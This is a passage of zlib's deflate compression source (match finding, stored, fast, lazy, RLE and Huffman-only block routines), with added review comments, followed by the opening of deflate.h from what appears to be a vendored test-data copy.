* IN assertions: cur_match is the head of the hash chain for the current * string (strstart) and its distance is <= MAX_DIST, and prev_length >= 1 * OUT assertion: the match length is not greater than s->lookahead. */ local uInt longest_match(deflate_state *s, IPos cur_match) { unsigned chain_length = s->max_chain_length;/* max hash chain length */ register Bytef *scan = s->window + s->strstart; /* current string */ register Bytef *match; /* matched string */ register int len; /* length of current match */ int best_len = (int)s->prev_length; /* best match length so far */ int nice_match = s->nice_match; /* stop if match long enough */ IPos limit = s->strstart > (IPos)MAX_DIST(s) ? s->strstart - (IPos)MAX_DIST(s) : NIL; /* Stop when cur_match becomes <= limit. To simplify the code, * we prevent matches with the string of window index 0. */ Posf *prev = s->prev; uInt wmask = s->w_mask; #ifdef UNALIGNED_OK /* Compare two bytes at a time. Note: this is not always beneficial. * Try with and without -DUNALIGNED_OK to check. */ register Bytef *strend = s->window + s->strstart + MAX_MATCH - 1; register ush scan_start = *(ushf*)scan; register ush scan_end = *(ushf*)(scan + best_len - 1); #else register Bytef *strend = s->window + s->strstart + MAX_MATCH; register Byte scan_end1 = scan[best_len - 1]; register Byte scan_end = scan[best_len]; #endif /* The code is optimized for HASH_BITS >= 8 and MAX_MATCH-2 multiple of 16. * It is easy to get rid of this optimization if necessary. */ Assert(s->hash_bits >= 8 && MAX_MATCH == 258, "Code too clever"); /* Do not waste too much time if we already have a good match: */ if (s->prev_length >= s->good_match) { chain_length >>= 2; } /* Do not look for matches beyond the end of the input. This is necessary * to make deflate deterministic. 
*/ if ((uInt)nice_match > s->lookahead) nice_match = (int)s->lookahead; Assert((ulg)s->strstart <= s->window_size - MIN_LOOKAHEAD, "need lookahead"); do { Assert(cur_match < s->strstart, "no future"); match = s->window + cur_match; /* Skip to next match if the match length cannot increase * or if the match length is less than 2. Note that the checks below * for insufficient lookahead only occur occasionally for performance * reasons. Therefore uninitialized memory will be accessed, and * conditional jumps will be made that depend on those values. * However the length of the match is limited to the lookahead, so * the output of deflate is not affected by the uninitialized values. */ #if (defined(UNALIGNED_OK) && MAX_MATCH == 258) /* This code assumes sizeof(unsigned short) == 2. Do not use * UNALIGNED_OK if your compiler uses a different size. */ if (*(ushf*)(match + best_len - 1) != scan_end || *(ushf*)match != scan_start) continue; /* It is not necessary to compare scan[2] and match[2] since they are * always equal when the other bytes match, given that the hash keys * are equal and that HASH_BITS >= 8. Compare 2 bytes at a time at * strstart + 3, + 5, up to strstart + 257. We check for insufficient * lookahead only every 4th comparison; the 128th check will be made * at strstart + 257. If MAX_MATCH-2 is not a multiple of 8, it is * necessary to put more guard bytes at the end of the window, or * to check more often for insufficient lookahead. 
*/ Assert(scan[2] == match[2], "scan[2]?"); scan++, match++; do { } while (*(ushf*)(scan += 2) == *(ushf*)(match += 2) && *(ushf*)(scan += 2) == *(ushf*)(match += 2) && *(ushf*)(scan += 2) == *(ushf*)(match += 2) && *(ushf*)(scan += 2) == *(ushf*)(match += 2) && scan < strend); /* The funny "do {}" generates better code on most compilers */ /* Here, scan <= window + strstart + 257 */ Assert(scan <= s->window + (unsigned)(s->window_size - 1), "wild scan"); if (*scan == *match) scan++; len = (MAX_MATCH - 1) - (int)(strend - scan); scan = strend - (MAX_MATCH-1); #else /* UNALIGNED_OK */ if (match[best_len] != scan_end || match[best_len - 1] != scan_end1 || *match != *scan || *++match != scan[1]) continue; /* The check at best_len - 1 can be removed because it will be made * again later. (This heuristic is not always a win.) * It is not necessary to compare scan[2] and match[2] since they * are always equal when the other bytes match, given that * the hash keys are equal and that HASH_BITS >= 8. */ scan += 2, match++; Assert(*scan == *match, "match[2]?"); /* We check for insufficient lookahead only every 8th comparison; * the 256th check will be made at strstart + 258. 
*/
        do {
        } while (*++scan == *++match && *++scan == *++match &&
                 *++scan == *++match && *++scan == *++match &&
                 *++scan == *++match && *++scan == *++match &&
                 *++scan == *++match && *++scan == *++match &&
                 scan < strend);

        Assert(scan <= s->window + (unsigned)(s->window_size - 1),
               "wild scan");

        len = MAX_MATCH - (int)(strend - scan);
        scan = strend - MAX_MATCH;

#endif /* UNALIGNED_OK */

        if (len > best_len) {
            s->match_start = cur_match;
            best_len = len;
            if (len >= nice_match) break;
#ifdef UNALIGNED_OK
            scan_end = *(ushf*)(scan + best_len - 1);
#else
            scan_end1  = scan[best_len - 1];
            scan_end   = scan[best_len];
#endif
        }
    } while ((cur_match = prev[cur_match & wmask]) > limit
             && --chain_length != 0);

    if ((uInt)best_len <= s->lookahead) return (uInt)best_len;
    return s->lookahead;
}

#else /* FASTEST */

/* ---------------------------------------------------------------------------
 * Optimized version for FASTEST only
 *
 * Compares the string at s->strstart against the single candidate at
 * cur_match; this variant does not walk the hash chain.
 *
 * Returns MIN_MATCH-1 when the first two bytes differ or the match is
 * shorter than MIN_MATCH. Otherwise stores cur_match in s->match_start and
 * returns the match length, clamped to s->lookahead.
 *
 * Memory-safety note: the unrolled compare loop tests scan < strend only
 * once per eight byte comparisons, with strend = strstart + MAX_MATCH, so
 * bytes beyond the valid lookahead can be read. The clamp on return keeps
 * those bytes from influencing the result. deflate.h describes WIN_INIT and
 * high_water as the mechanism that keeps the bytes after the data
 * initialized for exactly this access pattern.
 * NOTE(review): the bounds preconditions are expressed only through
 * Assert(); its definition is not visible here, so confirm whether it is
 * active in release builds or whether callers alone guarantee them.
 */
local uInt longest_match(deflate_state *s, IPos cur_match) {
    register Bytef *scan = s->window + s->strstart; /* current string */
    register Bytef *match;                       /* matched string */
    register int len;                           /* length of current match */
    register Bytef *strend = s->window + s->strstart + MAX_MATCH;

    /* The code is optimized for HASH_BITS >= 8 and MAX_MATCH-2 multiple of 16.
     * It is easy to get rid of this optimization if necessary.
     */
    Assert(s->hash_bits >= 8 && MAX_MATCH == 258, "Code too clever");

    /* Precondition: at least MIN_LOOKAHEAD bytes of window remain after
     * strstart, so the over-read described above stays inside the window.
     */
    Assert((ulg)s->strstart <= s->window_size - MIN_LOOKAHEAD,
           "need lookahead");

    /* Precondition: the candidate lies strictly before the current string. */
    Assert(cur_match < s->strstart, "no future");

    match = s->window + cur_match;

    /* Return failure if the match length is less than 2:
     */
    if (match[0] != scan[0] || match[1] != scan[1]) return MIN_MATCH-1;

    /* The check at best_len - 1 can be removed because it will be made
     * again later. (This heuristic is not always a win.)
     * It is not necessary to compare scan[2] and match[2] since they
     * are always equal when the other bytes match, given that
     * the hash keys are equal and that HASH_BITS >= 8.
     */
    scan += 2, match += 2;
    Assert(*scan == *match, "match[2]?");

    /* We check for insufficient lookahead only every 8th comparison;
     * the 256th check will be made at strstart + 258.
     */
    do {
    } while (*++scan == *++match && *++scan == *++match &&
             *++scan == *++match && *++scan == *++match &&
             *++scan == *++match && *++scan == *++match &&
             *++scan == *++match && *++scan == *++match &&
             scan < strend);

    Assert(scan <= s->window + (unsigned)(s->window_size - 1), "wild scan");

    len = MAX_MATCH - (int)(strend - scan);

    if (len < MIN_MATCH) return MIN_MATCH - 1;

    s->match_start = cur_match;
    /* Never report more than the valid lookahead, whatever the loop read. */
    return (uInt)len <= s->lookahead ? (uInt)len : s->lookahead;
}

#endif /* FASTEST */

#ifdef ZLIB_DEBUG

#define EQUAL 0
/* result of memcmp for equal strings */

/* ===========================================================================
 * Check that the match at match_start is indeed a match.
 *
 * Debug-only helper: it is compiled only under ZLIB_DEBUG; otherwise
 * check_match() is an empty macro (see the #else branch below).
 *
 * Compares `length` bytes at window[match] and window[start]. On a mismatch
 * it prints both byte sequences to stderr and calls z_error(). When
 * z_verbose > 1 it also echoes the matched bytes to stderr. In both cases
 * raw window contents (the data being compressed) are written to stderr.
 *
 * Both loops are do/while with a pre-decrement test, so `length` must be at
 * least 1 on entry; the callers visible in this file only pass a length that
 * is >= MIN_MATCH.
 * NOTE(review): after the mismatch dump, `length` has been counted down to 0
 * and start/match have advanced, so falling through to the z_verbose branch
 * would be wrong. Presumably z_error() does not return -- confirm.
 */
local void check_match(deflate_state *s, IPos start, IPos match, int length) {
    /* check that the match is indeed a match */
    if (zmemcmp(s->window + match,
                s->window + start, length) != EQUAL) {
        fprintf(stderr, " start %u, match %u, length %d\n",
                start, match, length);
        do {
            fprintf(stderr, "%c%c", s->window[match++], s->window[start++]);
        } while (--length != 0);
        z_error("invalid match");
    }
    if (z_verbose > 1) {
        fprintf(stderr,"\\[%d,%d]", start - match, length);
        do { putc(s->window[start++], stderr); } while (--length != 0);
    }
}
#else
#  define check_match(s, start, match, length)
#endif /* ZLIB_DEBUG */

/* ===========================================================================
 * Flush the current block, with given end-of-file flag.
 * IN assertion: strstart is set to the end of the current match.
 *
 * Passes a NULL buffer to _tr_flush_block() when block_start is negative,
 * otherwise a pointer to window[block_start]. The byte count is
 * strstart - block_start. block_start is then advanced to strstart and
 * flush_pending() is called on the stream.
 */
#define FLUSH_BLOCK_ONLY(s, last) { \
   _tr_flush_block(s, (s->block_start >= 0L ? \
                   (charf *)&s->window[(unsigned)s->block_start] : \
                   (charf *)Z_NULL), \
                (ulg)((long)s->strstart - s->block_start), \
                (last)); \
   s->block_start = s->strstart; \
   flush_pending(s->strm); \
   Tracev((stderr,"[FLUSH]")); \
}

/* Same but force premature exit if necessary.
 * This macro contains a `return` statement: when avail_out is 0 after the
 * flush it returns finish_started (last != 0) or need_more from the function
 * that uses it. It can therefore only be used inside functions that return
 * block_state, and code after it does not run in that case.
 */
#define FLUSH_BLOCK(s, last) { \
   FLUSH_BLOCK_ONLY(s, last); \
   if (s->strm->avail_out == 0) return (last) ? finish_started : need_more; \
}

/* Maximum stored block length in deflate format (not including header). */
#define MAX_STORED 65535

/* Minimum of a and b.
 * Each argument is evaluated twice; pass only side-effect-free expressions.
 */
#define MIN(a, b) ((a) > (b) ? (b) : (a))

/* ===========================================================================
 * Copy without compression as much as possible from the input stream, return
 * the current block state.
 *
 * In case deflateParams() is used to later switch to a non-zero compression
 * level, s->matches (otherwise unused when storing) keeps track of the number
 * of hash table slides to perform. If s->matches is 1, then one hash table
 * slide will be done when switching. If s->matches is 2, the maximum value
 * allowed here, then the hash table will be cleared, since two or more slides
 * is the same as a clear.
 *
 * deflate_stored() is written to minimize the number of times an input byte is
 * copied. It is most efficient with large input and output buffers, which
 * maximizes the opportunities to have a single copy from next_in to next_out.
 *
 * Returns finish_done once the last block has been written to next_out,
 * block_done when flushing (other than Z_FINISH) with all input consumed,
 * and otherwise finish_started or need_more depending on whether a last
 * block was emitted into the pending buffer.
 */
local block_state deflate_stored(deflate_state *s, int flush) {
    /* Smallest worthy block size when not flushing or finishing. By default
     * this is 32K. This can be as small as 507 bytes for memLevel == 1. For
     * large input and output buffers, the stored block size will be larger.
     * NOTE(review): the 5 is presumably the stored-block header size in
     * bytes -- confirm against _tr_stored_block().
     */
    unsigned min_block = MIN(s->pending_buf_size - 5, s->w_size);

    /* Copy as many min_block or larger stored blocks directly to next_out as
     * possible. If flushing, copy the remaining available input to next_out as
     * stored blocks, if there is enough space.
     */
    unsigned len, left, have, last = 0;
    unsigned used = s->strm->avail_in;
    do {
        /* Set len to the maximum size block that we can copy directly with the
         * available input data and output space. Set left to how much of that
         * would be copied from what's left in the window.
         */
        len = MAX_STORED;       /* maximum deflate stored block length */
        /* NOTE(review): 42 presumably is 3 block-header bits, plus 7 to round
         * up to a whole byte, plus 32 bits of LEN/NLEN -- confirm.
         */
        have = (s->bi_valid + 42) >> 3;         /* number of header bytes */
        if (s->strm->avail_out < have)          /* need room for header */
            break;
            /* maximum stored block length that will fit in avail_out: */
        have = s->strm->avail_out - have;
        left = s->strstart - s->block_start;    /* bytes left in window */
        if (len > (ulg)left + s->strm->avail_in)
            len = left + s->strm->avail_in;     /* limit len to the input */
        /* This bound is what keeps the two copies into next_out below within
         * avail_out: together they write exactly len bytes.
         */
        if (len > have)
            len = have;                         /* limit len to the output */

        /* If the stored block would be less than min_block in length, or if
         * unable to copy all of the available input when flushing, then try
         * copying to the window and the pending buffer instead. Also don't
         * write an empty block when flushing -- deflate() does that.
         */
        if (len < min_block && ((len == 0 && flush != Z_FINISH) ||
                                flush == Z_NO_FLUSH ||
                                len != left + s->strm->avail_in))
            break;

        /* Make a dummy stored block in pending to get the header bytes,
         * including any pending bits. This also updates the debugging counts.
         */
        last = flush == Z_FINISH && len == left + s->strm->avail_in ? 1 : 0;
        _tr_stored_block(s, (char *)0, 0L, last);

        /* Replace the lengths in the dummy stored block with len.
         * The four bytes at pending - 4 .. pending - 1 receive len (low byte
         * first) followed by its one's complement. The negative offsets rely
         * on _tr_stored_block() having just appended those four bytes.
         */
        s->pending_buf[s->pending - 4] = len;
        s->pending_buf[s->pending - 3] = len >> 8;
        s->pending_buf[s->pending - 2] = ~len;
        s->pending_buf[s->pending - 1] = ~len >> 8;

        /* Write the stored block header bytes. */
        flush_pending(s->strm);

#ifdef ZLIB_DEBUG
        /* Update debugging counts for the data about to be copied. */
        s->compressed_len += len << 3;
        s->bits_sent += len << 3;
#endif

        /* Copy uncompressed bytes from the window to next_out. */
        if (left) {
            if (left > len)
                left = len;
            zmemcpy(s->strm->next_out, s->window + s->block_start, left);
            s->strm->next_out += left;
            s->strm->avail_out -= left;
            s->strm->total_out += left;
            s->block_start += left;
            len -= left;
        }

        /* Copy uncompressed bytes directly from next_in to next_out, updating
         * the check value.
         */
        if (len) {
            read_buf(s->strm, s->strm->next_out, len);
            s->strm->next_out += len;
            s->strm->avail_out -= len;
            s->strm->total_out += len;
        }
    } while (last == 0);

    /* Update the sliding window with the last s->w_size bytes of the copied
     * data, or append all of the copied data to the existing window if less
     * than s->w_size bytes were copied. Also update the number of bytes to
     * insert in the hash tables, in the event that deflateParams() switches to
     * a non-zero compression level.
     */
    used -= s->strm->avail_in;      /* number of input bytes directly copied */
    if (used) {
        /* If any input was used, then no unused input remains in the window,
         * therefore s->block_start == s->strstart.
         */
        if (used >= s->w_size) {    /* supplant the previous history */
            s->matches = 2;         /* clear hash */
            /* Reads backwards from next_in. This stays inside the caller's
             * input buffer only because at least w_size bytes were consumed
             * from it in this call (used >= w_size).
             * NOTE(review): assumes read_buf() advances next_in by the amount
             * it copies -- read_buf() is not visible here, confirm.
             */
            zmemcpy(s->window, s->strm->next_in - s->w_size, s->w_size);
            s->strstart = s->w_size;
            s->insert = s->strstart;
        }
        else {
            if (s->window_size - s->strstart <= used) {
                /* Slide the window down. */
                s->strstart -= s->w_size;
                zmemcpy(s->window, s->window + s->w_size, s->strstart);
                if (s->matches < 2)
                    s->matches++;   /* add a pending slide_hash() */
                if (s->insert > s->strstart)
                    s->insert = s->strstart;
            }
            /* Same backwards read as above, bounded by `used`. */
            zmemcpy(s->window + s->strstart, s->strm->next_in - used, used);
            s->strstart += used;
            s->insert += MIN(used, s->w_size - s->insert);
        }
        s->block_start = s->strstart;
    }
    /* Track how far the window holds initialized bytes. */
    if (s->high_water < s->strstart)
        s->high_water = s->strstart;

    /* If the last block was written to next_out, then done. */
    if (last)
        return finish_done;

    /* If flushing and all input has been consumed, then done. */
    if (flush != Z_NO_FLUSH && flush != Z_FINISH &&
        s->strm->avail_in == 0 && (long)s->strstart == s->block_start)
        return block_done;

    /* Fill the window with any remaining input. */
    have = s->window_size - s->strstart;
    if (s->strm->avail_in > have && s->block_start >= (long)s->w_size) {
        /* Slide the window down. */
        s->block_start -= s->w_size;
        s->strstart -= s->w_size;
        zmemcpy(s->window, s->window + s->w_size, s->strstart);
        if (s->matches < 2)
            s->matches++;           /* add a pending slide_hash() */
        have += s->w_size;          /* more space now */
        if (s->insert > s->strstart)
            s->insert = s->strstart;
    }
    /* `have` is the free space after strstart; clamp the read to the input. */
    if (have > s->strm->avail_in)
        have = s->strm->avail_in;
    if (have) {
        read_buf(s->strm, s->window + s->strstart, have);
        s->strstart += have;
        s->insert += MIN(have, s->w_size - s->insert);
    }
    if (s->high_water < s->strstart)
        s->high_water = s->strstart;

    /* There was not enough avail_out to write a complete worthy or flushed
     * stored block to next_out. Write a stored block to pending instead, if we
     * have enough input for a worthy block, or if flushing and there is enough
     * room for the remaining input as a stored block in the pending buffer.
     */
    have = (s->bi_valid + 42) >> 3;         /* number of header bytes */
        /* maximum stored block length that will fit in pending: */
    have = MIN(s->pending_buf_size - have, MAX_STORED);
    min_block = MIN(have, s->w_size);
    left = s->strstart - s->block_start;
    if (left >= min_block ||
        ((left || flush == Z_FINISH) && flush != Z_NO_FLUSH &&
         s->strm->avail_in == 0 && left <= have)) {
        len = MIN(left, have);
        last = flush == Z_FINISH && s->strm->avail_in == 0 &&
               len == left ? 1 : 0;
        _tr_stored_block(s, (charf *)s->window + s->block_start, len, last);
        s->block_start += len;
        flush_pending(s->strm);
    }

    /* We've done all we can with the available input and output. */
    return last ? finish_started : need_more;
}

/* ===========================================================================
 * Compress as much as possible from the input stream, return the current
 * block state.
* This function does not perform lazy evaluation of matches and inserts
 * new strings in the dictionary only for unmatched strings or for short
 * matches. It is used only for the fast compression options.
 *
 * Returns need_more when more input is required (or, through FLUSH_BLOCK,
 * when the output buffer is full), block_done after a flush other than
 * Z_FINISH, and finish_started or finish_done for Z_FINISH depending on
 * whether the last block could be written out completely.
 */
local block_state deflate_fast(deflate_state *s, int flush) {
    IPos hash_head;       /* head of the hash chain */
    int bflush;           /* set if current block must be flushed */

    for (;;) {
        /* Make sure that we always have enough lookahead, except
         * at the end of the input file. We need MAX_MATCH bytes
         * for the next match, plus MIN_MATCH bytes to insert the
         * string following the next match.
         */
        if (s->lookahead < MIN_LOOKAHEAD) {
            fill_window(s);
            if (s->lookahead < MIN_LOOKAHEAD && flush == Z_NO_FLUSH) {
                return need_more;
            }
            if (s->lookahead == 0) break; /* flush the current block */
        }

        /* Insert the string window[strstart .. strstart + 2] in the
         * dictionary, and set hash_head to the head of the hash chain:
         */
        hash_head = NIL;
        if (s->lookahead >= MIN_MATCH) {
            INSERT_STRING(s, s->strstart, hash_head);
        }

        /* Find the longest match, discarding those <= prev_length.
         * At this point we have always match_length < MIN_MATCH
         */
        /* The distance test keeps the candidate within MAX_DIST(s) of
         * strstart before longest_match() dereferences it.
         */
        if (hash_head != NIL && s->strstart - hash_head <= MAX_DIST(s)) {
            /* To simplify the code, we prevent matches with the string
             * of window index 0 (in particular we have to avoid a match
             * of the string with itself at the start of the input file).
             */
            s->match_length = longest_match (s, hash_head);
            /* longest_match() sets match_start */
        }
        if (s->match_length >= MIN_MATCH) {
            check_match(s, s->strstart, s->match_start, s->match_length);

            _tr_tally_dist(s, s->strstart - s->match_start,
                           s->match_length - MIN_MATCH, bflush);

            s->lookahead -= s->match_length;

            /* Insert new strings in the hash table only if the match length
             * is not too large. This saves time but degrades compression.
             */
#ifndef FASTEST
            if (s->match_length <= s->max_insert_length &&
                s->lookahead >= MIN_MATCH) {
                s->match_length--; /* string at strstart already in table */
                do {
                    s->strstart++;
                    INSERT_STRING(s, s->strstart, hash_head);
                    /* strstart never exceeds WSIZE-MAX_MATCH, so there are
                     * always MIN_MATCH bytes ahead.
                     */
                } while (--s->match_length != 0);
                s->strstart++;
            } else
#endif
            {
                s->strstart += s->match_length;
                s->match_length = 0;
                s->ins_h = s->window[s->strstart];
                UPDATE_HASH(s, s->ins_h, s->window[s->strstart + 1]);
                /* The text inside the following #if is not C: it makes the
                 * build fail if MIN_MATCH is ever changed from 3 without
                 * extending the hash priming above.
                 */
#if MIN_MATCH != 3
                Call UPDATE_HASH() MIN_MATCH-3 more times
#endif
                /* If lookahead < MIN_MATCH, ins_h is garbage, but it does not
                 * matter since it will be recomputed at next deflate call.
                 */
            }
        } else {
            /* No match, output a literal byte */
            Tracevv((stderr,"%c", s->window[s->strstart]));
            _tr_tally_lit(s, s->window[s->strstart], bflush);
            s->lookahead--;
            s->strstart++;
        }
        /* bflush is set by the tally macros when the symbol buffer is full;
         * FLUSH_BLOCK may return from this function.
         */
        if (bflush) FLUSH_BLOCK(s, 0);
    }
    s->insert = s->strstart < MIN_MATCH-1 ? s->strstart : MIN_MATCH-1;
    if (flush == Z_FINISH) {
        FLUSH_BLOCK(s, 1);
        return finish_done;
    }
    if (s->sym_next)
        FLUSH_BLOCK(s, 0);
    return block_done;
}

#ifndef FASTEST
/* ===========================================================================
 * Same as above, but achieves better compression. We use a lazy
 * evaluation for matches: a match is finally adopted only if there is
 * no better match at the next window position.
 *
 * Return values follow the same scheme as deflate_fast(); in addition,
 * need_more is returned directly when avail_out reaches 0 after a literal
 * has been emitted.
 */
local block_state deflate_slow(deflate_state *s, int flush) {
    IPos hash_head;          /* head of hash chain */
    int bflush;              /* set if current block must be flushed */

    /* Process the input block. */
    for (;;) {
        /* Make sure that we always have enough lookahead, except
         * at the end of the input file. We need MAX_MATCH bytes
         * for the next match, plus MIN_MATCH bytes to insert the
         * string following the next match.
         */
        if (s->lookahead < MIN_LOOKAHEAD) {
            fill_window(s);
            if (s->lookahead < MIN_LOOKAHEAD && flush == Z_NO_FLUSH) {
                return need_more;
            }
            if (s->lookahead == 0) break; /* flush the current block */
        }

        /* Insert the string window[strstart .. strstart + 2] in the
         * dictionary, and set hash_head to the head of the hash chain:
         */
        hash_head = NIL;
        if (s->lookahead >= MIN_MATCH) {
            INSERT_STRING(s, s->strstart, hash_head);
        }

        /* Find the longest match, discarding those <= prev_length.
         */
        s->prev_length = s->match_length, s->prev_match = s->match_start;
        s->match_length = MIN_MATCH-1;

        if (hash_head != NIL && s->prev_length < s->max_lazy_match &&
            s->strstart - hash_head <= MAX_DIST(s)) {
            /* To simplify the code, we prevent matches with the string
             * of window index 0 (in particular we have to avoid a match
             * of the string with itself at the start of the input file).
             */
            s->match_length = longest_match (s, hash_head);
            /* longest_match() sets match_start */

            if (s->match_length <= 5 && (s->strategy == Z_FILTERED
#if TOO_FAR <= 32767
                || (s->match_length == MIN_MATCH &&
                    s->strstart - s->match_start > TOO_FAR)
#endif
                )) {

                /* If prev_match is also MIN_MATCH, match_start is garbage
                 * but we will ignore the current match anyway.
                 */
                s->match_length = MIN_MATCH-1;
            }
        }
        /* If there was a match at the previous step and the current
         * match is not better, output the previous match:
         */
        if (s->prev_length >= MIN_MATCH && s->match_length <= s->prev_length) {
            uInt max_insert = s->strstart + s->lookahead - MIN_MATCH;
            /* Do not insert strings in hash table beyond this. */

            check_match(s, s->strstart - 1, s->prev_match, s->prev_length);

            _tr_tally_dist(s, s->strstart - 1 - s->prev_match,
                           s->prev_length - MIN_MATCH, bflush);

            /* Insert in hash table all strings up to the end of the match.
             * strstart - 1 and strstart are already inserted. If there is not
             * enough lookahead, the last two strings are not inserted in
             * the hash table.
             */
            s->lookahead -= s->prev_length - 1;
            s->prev_length -= 2;
            do {
                /* max_insert keeps INSERT_STRING from being applied to a
                 * position with fewer than MIN_MATCH valid bytes after it.
                 */
                if (++s->strstart <= max_insert) {
                    INSERT_STRING(s, s->strstart, hash_head);
                }
            } while (--s->prev_length != 0);
            s->match_available = 0;
            s->match_length = MIN_MATCH-1;
            s->strstart++;

            if (bflush) FLUSH_BLOCK(s, 0);

        } else if (s->match_available) {
            /* If there was no match at the previous position, output a
             * single literal. If there was a match but the current match
             * is longer, truncate the previous match to a single literal.
             */
            Tracevv((stderr,"%c", s->window[s->strstart - 1]));
            _tr_tally_lit(s, s->window[s->strstart - 1], bflush);
            /* FLUSH_BLOCK_ONLY is used here so that strstart and lookahead
             * are still updated before the avail_out check below returns.
             */
            if (bflush) {
                FLUSH_BLOCK_ONLY(s, 0);
            }
            s->strstart++;
            s->lookahead--;
            if (s->strm->avail_out == 0) return need_more;
        } else {
            /* There is no previous match to compare with, wait for
             * the next step to decide.
             */
            s->match_available = 1;
            s->strstart++;
            s->lookahead--;
        }
    }
    Assert (flush != Z_NO_FLUSH, "no flush?");
    if (s->match_available) {
        Tracevv((stderr,"%c", s->window[s->strstart - 1]));
        _tr_tally_lit(s, s->window[s->strstart - 1], bflush);
        s->match_available = 0;
    }
    s->insert = s->strstart < MIN_MATCH-1 ? s->strstart : MIN_MATCH-1;
    if (flush == Z_FINISH) {
        FLUSH_BLOCK(s, 1);
        return finish_done;
    }
    if (s->sym_next)
        FLUSH_BLOCK(s, 0);
    return block_done;
}
#endif /* FASTEST */

/* ===========================================================================
 * For Z_RLE, simply look for runs of bytes, generate matches only of distance
 * one. Do not maintain a hash table. (It will be regenerated if this run of
 * deflate switches away from Z_RLE.)
 *
 * The run scan tests scan < strend only once per eight comparisons, so it
 * can read past the valid lookahead near the end of input; the resulting
 * length is clamped to s->lookahead before it is used.
 */
local block_state deflate_rle(deflate_state *s, int flush) {
    int bflush;             /* set if current block must be flushed */
    uInt prev;              /* byte at distance one to match */
    Bytef *scan, *strend;   /* scan goes up to strend for length of run */

    for (;;) {
        /* Make sure that we always have enough lookahead, except
         * at the end of the input file. We need MAX_MATCH bytes
         * for the longest run, plus one for the unrolled loop.
         */
        if (s->lookahead <= MAX_MATCH) {
            fill_window(s);
            if (s->lookahead <= MAX_MATCH && flush == Z_NO_FLUSH) {
                return need_more;
            }
            if (s->lookahead == 0) break; /* flush the current block */
        }

        /* See how many times the previous byte repeats */
        s->match_length = 0;
        /* strstart > 0 guarantees that window[strstart - 1] exists. */
        if (s->lookahead >= MIN_MATCH && s->strstart > 0) {
            scan = s->window + s->strstart - 1;
            prev = *scan;
            if (prev == *++scan && prev == *++scan && prev == *++scan) {
                strend = s->window + s->strstart + MAX_MATCH;
                do {
                } while (prev == *++scan && prev == *++scan &&
                         prev == *++scan && prev == *++scan &&
                         prev == *++scan && prev == *++scan &&
                         prev == *++scan && prev == *++scan &&
                         scan < strend);
                s->match_length = MAX_MATCH - (uInt)(strend - scan);
                if (s->match_length > s->lookahead)
                    s->match_length = s->lookahead;
            }
            Assert(scan <= s->window + (uInt)(s->window_size - 1),
                   "wild scan");
        }

        /* Emit match if have run of MIN_MATCH or longer, else emit literal */
        if (s->match_length >= MIN_MATCH) {
            check_match(s, s->strstart, s->strstart - 1, s->match_length);

            _tr_tally_dist(s, 1, s->match_length - MIN_MATCH, bflush);

            s->lookahead -= s->match_length;
            s->strstart += s->match_length;
            s->match_length = 0;
        } else {
            /* No match, output a literal byte */
            Tracevv((stderr,"%c", s->window[s->strstart]));
            _tr_tally_lit(s, s->window[s->strstart], bflush);
            s->lookahead--;
            s->strstart++;
        }
        if (bflush) FLUSH_BLOCK(s, 0);
    }
    s->insert = 0;
    if (flush == Z_FINISH) {
        FLUSH_BLOCK(s, 1);
        return finish_done;
    }
    if (s->sym_next)
        FLUSH_BLOCK(s, 0);
    return block_done;
}

/* ===========================================================================
 * For Z_HUFFMAN_ONLY, do not look for matches. Do not maintain a hash table.
 * (It will be regenerated if this run of deflate switches away from Huffman.)
 *
 * Every input byte is tallied as a literal. Return values follow the same
 * scheme as the other deflate_* routines in this file.
 */
local block_state deflate_huff(deflate_state *s, int flush) {
    int bflush;             /* set if current block must be flushed */

    for (;;) {
        /* Make sure that we have a literal to write. */
        if (s->lookahead == 0) {
            fill_window(s);
            if (s->lookahead == 0) {
                if (flush == Z_NO_FLUSH)
                    return need_more;
                break;      /* flush the current block */
            }
        }

        /* Output a literal byte */
        s->match_length = 0;
        Tracevv((stderr,"%c", s->window[s->strstart]));
        _tr_tally_lit(s, s->window[s->strstart], bflush);
        s->lookahead--;
        s->strstart++;
        if (bflush) FLUSH_BLOCK(s, 0);
    }
    s->insert = 0;
    if (flush == Z_FINISH) {
        FLUSH_BLOCK(s, 1);
        return finish_done;
    }
    if (s->sym_next)
        FLUSH_BLOCK(s, 0);
    return block_done;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/deflate.h
================================================
/* deflate.h -- internal compression state
 * Copyright (C) 1995-2018 Jean-loup Gailly
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

/* WARNING: this file should *not* be used by applications. It is
   part of the implementation of the compression library and is
   subject to change. Applications should only use zlib.h.
 */

/* @(#) $Id$ */

#ifndef DEFLATE_H
#define DEFLATE_H

#include "zutil.h"

/* define NO_GZIP when compiling if you want to disable gzip header and
   trailer creation by deflate().  NO_GZIP would be used to avoid linking in
   the crc code when it is not needed.  For shared libraries, gzip encoding
   should be left enabled. */
#ifndef NO_GZIP
#  define GZIP
#endif

/* ===========================================================================
 * Internal compression state.
*/

#define LENGTH_CODES 29
/* number of length codes, not counting the special END_BLOCK code */

#define LITERALS  256
/* number of literal bytes 0..255 */

#define L_CODES (LITERALS+1+LENGTH_CODES)
/* number of Literal or Length codes, including the END_BLOCK code */

#define D_CODES   30
/* number of distance codes */

#define BL_CODES  19
/* number of codes used to transfer the bit lengths */

#define HEAP_SIZE (2*L_CODES+1)
/* maximum heap size */

#define MAX_BITS 15
/* All codes must not exceed MAX_BITS bits */

#define Buf_size 16
/* size of bit buffer in bi_buf */

#define INIT_STATE      42   /* zlib header -> BUSY_STATE */
#ifdef GZIP
#  define GZIP_STATE    57   /* gzip header -> BUSY_STATE | EXTRA_STATE */
#endif
#define EXTRA_STATE     69   /* gzip extra block -> NAME_STATE */
#define NAME_STATE      73   /* gzip file name -> COMMENT_STATE */
#define COMMENT_STATE   91   /* gzip comment -> HCRC_STATE */
#define HCRC_STATE     103   /* gzip header CRC -> BUSY_STATE */
#define BUSY_STATE     113   /* deflate -> FINISH_STATE */
#define FINISH_STATE   666   /* stream complete */
/* Stream status */


/* Data structure describing a single value and its code string. */
typedef struct ct_data_s {
    union {
        ush  freq;       /* frequency count */
        ush  code;       /* bit string */
    } fc;
    union {
        ush  dad;        /* father node in Huffman tree */
        ush  len;        /* length of bit string */
    } dl;
} FAR ct_data;

/* Shorthand accessors for the union members of ct_data. */
#define Freq fc.freq
#define Code fc.code
#define Dad  dl.dad
#define Len  dl.len

typedef struct static_tree_desc_s  static_tree_desc;

typedef struct tree_desc_s {
    ct_data *dyn_tree;           /* the dynamic tree */
    int     max_code;            /* largest code with non zero frequency */
